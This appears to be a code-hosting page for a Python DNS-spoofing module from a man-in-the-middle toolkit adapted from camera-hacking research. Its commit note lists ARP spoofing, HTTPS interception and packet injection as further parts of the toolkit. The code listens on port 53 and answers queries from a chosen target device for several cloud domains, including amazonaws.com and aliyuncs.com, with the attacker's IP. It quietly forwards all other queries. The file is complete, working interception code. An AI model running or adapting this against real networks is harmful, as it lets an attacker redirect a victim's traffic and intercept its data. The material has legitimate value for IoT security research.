Templated from cam-mitm. The camera-specific code (UBox cloud client, CVE verifiers, OAM HMAC signing, fuzzer wordlists) is removed; what's left is the generic core: ARP spoof, DNS spoof, HTTP/HTTPS interception with peek-before-wrap, raw sniffer with conntrack-based original-dst lookup, protocol fingerprinting, intruder detection, packet injection, log rotation, PyQt6 GUI on top of a service Controller. All 'camera' references renamed to 'target' throughout. Configuration moved into ~/.config/setec-mitm/config.json with the Settings tab as the primary editor. Plugin system at targets/<name>/plugin.py for vendor-specific code. See README.md for full setup, plugin authoring, and troubleshooting. Co-authored by Setec Labs.
86 lines
2.4 KiB
Python
86 lines
2.4 KiB
Python
"""DNS interception — spoofs cloud domains to point at us"""
|
|
|
|
import socket
|
|
import struct
|
|
from utils.log import log, C_SUCCESS, C_IMPORTANT, C_ERROR
|
|
|
|
SPOOF_DOMAINS = [b"ubianet.com", b"aliyuncs.com", b"amazonaws.com", b"myqcloud.com"]
|
|
|
|
|
|
def parse_dns_name(data, offset):
|
|
labels = []
|
|
while offset < len(data):
|
|
length = data[offset]
|
|
if length == 0:
|
|
offset += 1
|
|
break
|
|
if (length & 0xC0) == 0xC0:
|
|
ptr = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
|
|
labels.append(parse_dns_name(data, ptr)[0])
|
|
offset += 2
|
|
break
|
|
offset += 1
|
|
labels.append(data[offset:offset + length])
|
|
offset += length
|
|
return b".".join(labels), offset
|
|
|
|
|
|
def build_dns_response(query, ip):
|
|
resp = bytearray(query[:2])
|
|
resp += b"\x81\x80"
|
|
resp += query[4:6]
|
|
resp += b"\x00\x01\x00\x00\x00\x00"
|
|
resp += query[12:]
|
|
resp += b"\xc0\x0c\x00\x01\x00\x01"
|
|
resp += struct.pack("!I", 60)
|
|
resp += b"\x00\x04"
|
|
resp += socket.inet_aton(ip)
|
|
return bytes(resp)
|
|
|
|
|
|
def run(cfg, flags, running_check):
|
|
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
|
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
|
sock.settimeout(1)
|
|
try:
|
|
sock.bind(("0.0.0.0", 53))
|
|
except OSError as e:
|
|
log(f"DNS: bind :53 failed: {e}", C_ERROR)
|
|
return
|
|
|
|
flags["dns"] = True
|
|
log("DNS: listening on :53", C_SUCCESS)
|
|
|
|
while running_check():
|
|
try:
|
|
data, addr = sock.recvfrom(1024)
|
|
except socket.timeout:
|
|
continue
|
|
except:
|
|
break
|
|
if len(data) < 12:
|
|
continue
|
|
|
|
name, _ = parse_dns_name(data, 12)
|
|
name_str = name.decode("utf-8", errors="replace")
|
|
should_spoof = (addr[0] == cfg["target_ip"] and
|
|
any(d in name.lower() for d in SPOOF_DOMAINS))
|
|
|
|
if should_spoof:
|
|
resp = build_dns_response(data, cfg["our_ip"])
|
|
sock.sendto(resp, addr)
|
|
log(f"DNS: {name_str} -> SPOOFED", C_IMPORTANT)
|
|
else:
|
|
fwd = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
|
fwd.settimeout(3)
|
|
try:
|
|
fwd.sendto(data, (cfg["router_ip"], 53))
|
|
resp, _ = fwd.recvfrom(4096)
|
|
sock.sendto(resp, addr)
|
|
except:
|
|
pass
|
|
fwd.close()
|
|
|
|
sock.close()
|
|
flags["dns"] = False
|